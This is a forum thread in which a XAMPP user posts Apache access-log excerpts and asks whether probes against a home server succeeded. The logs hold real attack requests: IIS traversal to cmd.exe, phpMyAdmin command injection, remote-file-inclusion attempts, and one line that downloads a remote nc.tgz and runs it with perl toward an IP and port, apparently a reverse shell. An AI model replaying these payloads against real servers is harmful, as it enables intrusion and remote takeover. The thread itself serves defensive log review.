Help! Was my Server Hacked?

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Help! Was my Server Hacked?

Postby svengali » 13. December 2009 21:03

Hello All!

I'm new to this forum, and I'm here for security reasons. A few months ago, I set up a server to share pictures with my friends. I'm using xampp 1.7.2 and running Apache 2.0.63 and Filezilla Server. I was not quite familiar with Apache, so I just did the bare minimum. I had a myphpadmin password and changed the default accounts and password in Filezilla. I wasn't running mySQL. I have since learnt that Apache is pretty wide open and people have access to it over the network.

I was alarmed by the number of attempts to get into my server through FTP and my website. Although I only have pictures on this server, I am concerned about a breach where someone can control it over the network. I am pretty comfortable with the level of security on the Filezilla server. I have now shut down the server started securing Apache using instructions from Rob's Notebook http://robsnotebook.com/xampp-security-hardening. Most these instructions date back to 2007, but they still seem relevant. (ist that a good assumption to make?)

Anyway, before I restart my server I would like to know if it was breached. I have the Apache access and error log files and I would like some experienced eyes to look at the break-in attempts and tell me if any were successful and what was compromised.

The access files is rather large and includes some of my activities. So I edited it, removing the activity that I recognize. Even then it's pretty large.

I would like to know how to go about posting it. Should I just cut and paste? Is that against the rules or proper forum etiquette to do this? Please advise. Thanks.
svengali
 
Posts: 2
Joined: 13. December 2009 20:06

Re: Help! Was my Server Hacked?

Postby svengali » 16. December 2009 07:01

Ok. I guess it means that it's ok to just do what I want. Well, I always say it better to ask for forgiveness than to ask for permission.

Anyway, my initial shock and panic has worn off a bit. I did some research went to a site and looked up all the HTTP browser messages. From what I could tell, it appears that the attempts to get in were unsuccessful. Most of the errors were 400 type. But, I am not an expert.

Still, I have copied the activities below for comments/confirmation from the experts. I basically cut a 3MB file down to 22KB. A lot of the stuff was repetitive. I such cases I use the dots to indicate “more of the same” .

There is one particular attempt that concerns me. It is the first entry below between the asterisks.

Thanks in advance for your feedback. :)
------------------------------------------------------------

************************
202.129.207.68 - - [06/Nov/2009:03:17:37 -0600] "GET /msadc/..?..?..?../winnt/system32/cmd.exe HTTP/1.0" 200 1207 "-" "-"
************************

93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /phpmyadmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /phpMyAdmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /PMA/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /pma/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /admin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /dbadmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /mysql/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /myadmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /phpmyadmin2/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /phpMyAdmin2/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /phpMyAdmin-2/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:24 -0500] "GET /php-my-admin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
.
.
.
93.105.142.2 - - [07/Sep/2009:19:05:27 -0500] "GET /p/m/a/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 500 778 "-" "crimscanner/1.0"
.
.
61.160.216.63 - - [12/Sep/2009:15:57:33 -0500] "GET http://www.wantsfly.com/prx.php?hash=0D ... 61F312ED89 HTTP/1.0" 404 1168 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
...61.136.93.9 - - [13/Sep/2009:04:44:06 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.136.93.6 - - [13/Sep/2009:11:21:33 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.136.93.6 - - [13/Sep/2009:11:23:54 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
88.191.73.171 - - [13/Sep/2009:21:37:04 -0500] "GET ///install.txt HTTP/1.1" 404 1165 "-" "Plesk"
88.191.73.171 - - [14/Sep/2009:00:32:10 -0500] "GET //zencart//install.txt HTTP/1.1" 404 1166 "-" "Plesk"
88.191.73.171 - - [14/Sep/2009:03:32:50 -0500] "GET //shop//install.txt HTTP/1.1" 404 1165 "-" "Plesk"
92.240.68.153 - - [14/Sep/2009:07:22:14 -0500] "GET http://www.gameogre.com/reviewdirectory ... /Trash.jpg HTTP/1.1" 404 1168 "-" "webcollage/1.135a"

124.42.68.136 - - [26/Sep/2009:08:06:01 -0500] "GET /manager/html HTTP/1.1" 404 1165 "-" "Mozilla/3.0 (compatible; Indy Library)"
81.202.166.178 - - [26/Sep/2009:10:07:25 -0500] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 394 "-" "-"
124.42.68.136 - - [26/Sep/2009:10:37:07 -0500] "GET /manager/html HTTP/1.1" 404 1166 "-" "Mozilla/3.0 (compatible; Indy Library)"


208.80.193.32 - - [27/Sep/2009:02:15:37 -0500] "GET / HTTP/1.0" 200 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; yie6_SBC; .NET CLR 1.1.4322; PeoplePal 3.0)"
.
.
211.95.78.112 - - [27/Sep/2009:19:33:00 -0500] "GET http://ant.dsabuse.com/abc.php?auth=45V ... LoginId=43 HTTP/1.1" 404 1167 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"

61.160.216.63 - - [28/Sep/2009:10:43:56 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
61.136.93.6 - - [29/Sep/2009:17:56:21 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.160.216.63 - - [30/Sep/2009:17:14:55 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1168 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.20.108.76 - - [30/Sep/2009:20:03:09 -0500] "GET /scripts/setup.php HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:09 -0500] "GET /scripts/setup.php HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:10 -0500] "GET /phpMyAdmin/ HTTP/1.1" 403 1328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:10 -0500] "GET /sql/ HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:11 -0500] "GET /mysql/ HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

115.22.183.124 - - [01/Oct/2009:05:48:07 -0500] "GET /manager/html HTTP/1.1" 404 1165 "-" "Mozilla/3.0 (compatible; Indy Library)"
115.22.183.124 - - [01/Oct/2009:05:48:08 -0500] "GET /manager/html HTTP/1.1" 404 1165 "-" "Mozilla/3.0 (compatible; Indy Library)"
91.102.66.186 - - [01/Oct/2009:20:36:26 -0500] "GET http://www.icq.com/people HTTP/1.1" 404 1163 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"

67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1092 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /zen/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /zencart/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /zen-cart/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /cart/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /shop/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /store/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /E-commerce/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /e-commerce/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /commerce/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
61.160.216.63 - - [03/Oct/2009:22:19:18 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
92.240.68.153 - - [04/Oct/2009:06:41:53 -0500] "GET http://www.lgsry.com/images/jimthorpe_train7.jpg HTTP/1.1" 404 1165 "-" "webcollage/1.135a"
92.113.84.196 - - [04/Oct/2009:09:08:08 -0500] "GET http://www.cship.info/azenv.php HTTP/1.0" 404 1166 "-" "-"
92.113.84.196 - - [04/Oct/2009:09:08:28 -0500] "GET /" 400 1086 "-" "-"

203.169.225.68 - - [04/Oct/2009:15:23:55 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1092 "-" "Toata dragostea mea pentru diavola"
203.169.225.68 - - [04/Oct/2009:15:23:57 -0500] "GET /mail2//bin/msgimport HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
203.169.225.68 - - [04/Oct/2009:15:23:58 -0500] "GET /roundcubemail//bin/msgimport HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
203.169.225.68 - - [04/Oct/2009:15:23:58 -0500] "GET /rms//bin/msgimport HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
.
.
203.169.225.68 - - [04/Oct/2009:15:24:06 -0500] "GET HTTP/1.1" 400 1088 "-" "-"

95.154.210.100 - - [05/Oct/2009:07:42:14 -0500] "GET http://people.icq.com/people/ HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"
61.160.216.63 - - [05/Oct/2009:12:43:42 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
61.156.31.20 - - [05/Oct/2009:22:59:43 -0500] "GET /manager/html HTTP/1.1" 404 1166 "-" "Mozilla/3.0 (compatible; Indy Library)"

64.15.159.169 - - [06/Oct/2009:11:29:23 -0500] "GET //phpMyAdmin//scripts/setup.php HTTP/1.1" 403 1324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
64.15.159.169 - - [06/Oct/2009:11:29:23 -0500] "GET //phpMyAdmin//scripts/setup.php HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
61.160.216.63 - - [06/Oct/2009:13:37:44 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1168 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
64.15.159.169 - - [06/Oct/2009:15:00:14 -0500] "GET //phpmyadmin//scripts/setup.php HTTP/1.1" 403 1323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
64.15.159.169 - - [06/Oct/2009:15:00:14 -0500] "GET //phpmyadmin//scripts/setup.php HTTP/1.1" 403 1325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
61.136.93.9 - - [06/Oct/2009:23:40:11 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1211 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.136.93.30 - - [07/Oct/2009:10:22:53 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1211 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.160.216.63 - - [07/Oct/2009:10:57:40 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

82.98.141.7 - - [09/Oct/2009:07:52:33 -0500] "GET /user/soapCaller.bs HTTP/1.1" 404 1165 "-" "Morfeus Fucking Scanner"

88.212.3.30 - - [15/Oct/2009:13:29:16 -0500] "GET //phpMyAdmin/ HTTP/1.1" 403 1329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
88.212.3.30 - - [15/Oct/2009:13:29:16 -0500] "GET //phpmyadmin/ HTTP/1.1" 403 1329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

61.206.183.175 - - [17/Oct/2009:15:53:01 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 406 - "-" "core-project/1.0"

114.108.177.176 - - [18/Oct/2009:12:40:26 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1094 "-" "Toata dragostea mea pentru diavola"
114.108.177.176 - - [18/Oct/2009:12:40:27 -0500] "GET /roundcube//bin/msgimport HTTP/1.1" 404 1167 "-" "Toata dragostea mea pentru diavola"
114.108.177.176 - - [18/Oct/2009:12:40:27 -0500] "GET /rc//bin/msgimport HTTP/1.1" 404 1167 "-" "Toata dragostea mea pentru diavola"
114.108.177.176 - - [18/Oct/2009:12:40:28 -0500] "GET /mss2//bin/msgimport HTTP/1.1" 404 1167 "-" "Toata dragostea mea pentru diavola"
.
.
.
125.76.230.10 - - [20/Oct/2009:05:48:32 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1093 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [20/Oct/2009:05:48:33 -0500] "GET /install.txt HTTP/1.1" 404 1166 "-" "Toata dragostea mea pentru diavola"

92.240.68.152 - - [21/Oct/2009:09:53:33 -0500] "GET http://goblueridgecard.com/blog/files/2 ... z-sign.jpg HTTP/1.1" 404 1342 "http://www.altavista.com/image/randomlink" "webcollage/1.135a"

189.14.99.218 - - [25/Oct/2009:03:21:00 -0600] "GET /sumthin HTTP/1.0" 404 1162 "-" "-"

24.98.109.144 - - [01/Nov/2009:11:46:33 -0600] "GET http://71.56.95.140/ HTTP/1.0" 200 1210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

209.175.103.142 - - [03/Nov/2009:13:37:49 -0600] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 394 "-" "-"
209.175.103.142 - - [03/Nov/2009:22:48:09 -0600] "GET /phpmyadmin/main.php HTTP/1.0" 403 1326 "-" "-"
209.175.103.142 - - [03/Nov/2009:22:48:10 -0600] "GET /phpMyAdmin/main.php HTTP/1.0" 403 1326 "-" "-"
209.175.103.142 - - [03/Nov/2009:22:48:10 -0600] "GET /db/main.php HTTP/1.0" 404 1166 "-" "-"
.
.
.
209.175.103.142 - - [03/Nov/2009:22:49:20 -0600] "GET /administrator/phpMyAdmin-2.8.2/main.php HTTP/1.0" 404 1166 "-" "-"

66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpmyadmin/main.php HTTP/1.0" 403 1325 "-" "-"
66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpMyAdmin/main.php HTTP/1.0" 403 1325 "-" "-66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpmyadmin/main.php HTTP/1.0" 403 1325 "-" "-"
66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpMyAdmin/main.php HTTP/1.0" 403 1325 "-" "-
.
.
.
66.7.204.128 - - [04/Nov/2009:19:01:26 -0600] "GET /administrator/phpMyAdmin-2.8.2/main.php HTTP/1.0" 404 1165 "-" "-"

202.129.207.68 - - [06/Nov/2009:03:03:22 -0600] "GET /NULL.printer" 404 1161 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:03:54 -0600] "HEAD / HTTP/1.0" 200 - "-" "-"
202.129.207.68 - - [06/Nov/2009:03:03:56 -0600] "GET /.pl HTTP/1.0" 404 1161 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:03:57 -0600] "GET /*.ida HTTP/1.0" 403 1149 "-" "-
202.129.207.68 - - [06/Nov/2009:03:04:01 -0600] "GET /........../autoexec.bat HTTP/1.0" 403 1149 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:04:02 -0600] "GET /....../ all HTTP/1.0" 403 1163 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:06:06 -0600] "GET /.htaccess HTTP/1.0" 403 1149 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:06:07 -0600] "GET /.htaccess HTTP/1.0" 403 1149 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:06:30 -0600] "GET /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 1161 "-" "-"
.
.
.

************************
202.129.207.68 - - [06/Nov/2009:03:17:37 -0600] "GET /msadc/..?..?..?../winnt/system32/cmd.exe HTTP/1.0" 200 1207 "-" "-"
************************

61.146.233.114 - - [06/Nov/2009:20:43:08 -0600] "GET /vhcs2/ HTTP/1.0" 404 1165 "-" "Wget/1.10.2 (Red Hat modified)"

59.56.110.138 - - [07/Nov/2009:15:35:21 -0600] "GET http://www.intel.com/ HTTP/1.1" 200 1211 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"

212.214.41.52 - - [14/Nov/2009:00:28:10 -0600] "GET // HTTP/1.1" 200 5795 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

128.10.19.251 - - [15/Nov/2009:11:34:48 -0600] "HEAD /customer2.ibcWT.aac=hpIlBlogon/index.php HTTP/1.0" 404 - "-" "Wget/1.11.1"

203.152.210.122 - - [18/Nov/2009:06:16:05 -0600] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 1162 "-" "-"
203.152.210.122 - - [18/Nov/2009:06:16:06 -0600] "GET /adxmlrpc.php HTTP/1.0" 404 1162 "-" "-"
203.152.210.122 - - [18/Nov/2009:06:16:06 -0600] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 1162 "-" "-"

92.240.68.152 - - [19/Nov/2009:14:17:53 -0600] "GET http://www.ltscotland.org.uk/healthykid ... imming.gif HTTP/1.1" 404 1174 "-" "webcollage/1.135a"

67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /joomla/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /administrator/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /admin/index.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /tools/calendar.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /rss.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:42 -0600] "GET /BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"

92.68.249.36 - - [20/Nov/2009:14:55:19 -0600] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:19 -0600] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:19 -0600] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:20 -0600] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:20 -0600] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:20 -0600] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:21 -0600] "GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:21 -0600] "GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:21 -0600] "GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:22 -0600] "GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

216.177.193.90 - - [20/Nov/2009:21:08:29 -0600] "GET //phpmyadmin//scripts/setup.php HTTP/1.1" 403 1326 "-" "curl/7.16.4 (x86_64-redhat-linux-gnu) libcurl/7.16.4 NSS/3.11.7.1 zlib/1.2.3 libidn/0.6.14"
216.177.193.90 - - [20/Nov/2009:21:08:31 -0600] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 HTTP/1.1" 403 1326 "-" "libwww-perl/5.808"
216.177.193.90 - - [20/Nov/2009:21:08:31 -0600] "GET //phpMyAdmin//scripts/setup.php HTTP/1.1" 403 1326 "-" "curl/7.16.4 (x86_64-redhat-linux-gnu) libcurl/7.16.4 NSS/3.11.7.1 zlib/1.2.3 libidn/0.6.14"
216.177.193.90 - - [20/Nov/2009:21:08:32 -0600] "GET //phpMyAdmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 HTTP/1.1" 403 1326 "-" "libwww-perl/5.808"

68.90.62.2 - - [22/Nov/2009:23:21:23 -0600] "\xbad" 501 1097 "-" "-"

78.129.203.130 - - [29/Nov/2009:07:02:51 -0600] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
78.129.203.130 - - [29/Nov/2009:07:02:52 -0600] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
78.129.203.130 - - [29/Nov/2009:07:02:52 -0600] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

91.120.21.66 - - [05/Dec/2009:05:16:08 -0600] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.120.21.66 - - [05/Dec/2009:05:16:08 -0600] "GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.120.21.66 - - [05/Dec/2009:05:16:09 -0600] "GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
.
.
.
91.120.21.66 - - [05/Dec/2009:05:16:37 -0600] "GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

87.230.74.45 - - [06/Dec/2009:00:14:30 -0600] "GET /din.aspx?s=00000000&client=DynGate&rnd=286487872&p=10000001 HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"

61.160.216.63 - - [06/Dec/2009:10:50:05 -0600] "GET http://www.wantsfly.com/prx2.php?hash=8 ... 3EF2F58C2B HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
61.136.208.20 - - [06/Dec/2009:17:55:44 -0600] "GET //admin/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
61.136.208.20 - - [06/Dec/2009:17:55:45 -0600] "GET //admin/pma/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
61.136.208.20 - - [06/Dec/2009:17:55:45 -0600] "GET //admin/phpmyadmin/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
61.136.208.20 - - [06/Dec/2009:17:55:46 -0600] "GET //db/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
.
.
.
61.136.208.20 - - [06/Dec/2009:17:55:43 -0600] "GET // HTTP/1.1" 200 5851 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

127.0.0.1 - - [07/Dec/2009:00:41:46 -0600] "GET /phpmyadmin/js/mooRainbow/mooRainbow.css HTTP/1.1" 200 2270 "http://localhost/phpmyadmin/main.php?lang=en-utf-8&convcharset=utf-8&collation_connection=utf8_general_ci&token=9023f53694879f51c2e92ecff5878e8f&phpMyAdmin=srmapami6c9fava0s18qsv75ehbcuf1n" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
svengali
 
Posts: 2
Joined: 13. December 2009 20:06

Re: Help! Was my Server Hacked?

Postby asegur » 11. January 2010 13:15

Hello. I am getting similar log lines, but in some of them apache gives response 301:

213.145.134.166 - - [10/Jan/2010:08:32:12 +0100] "GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1" 301 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

I read that 301 is a redirection answer, but I don't understand why is this response given and or where is apache redirecting this request to.

Does this mean that the attack is getting some result?

Please help. Thanks.
asegur
 
Posts: 1
Joined: 11. January 2010 13:10


Return to XAMPP for Windows

Who is online

Users browsing this forum: No registered users and 50 guests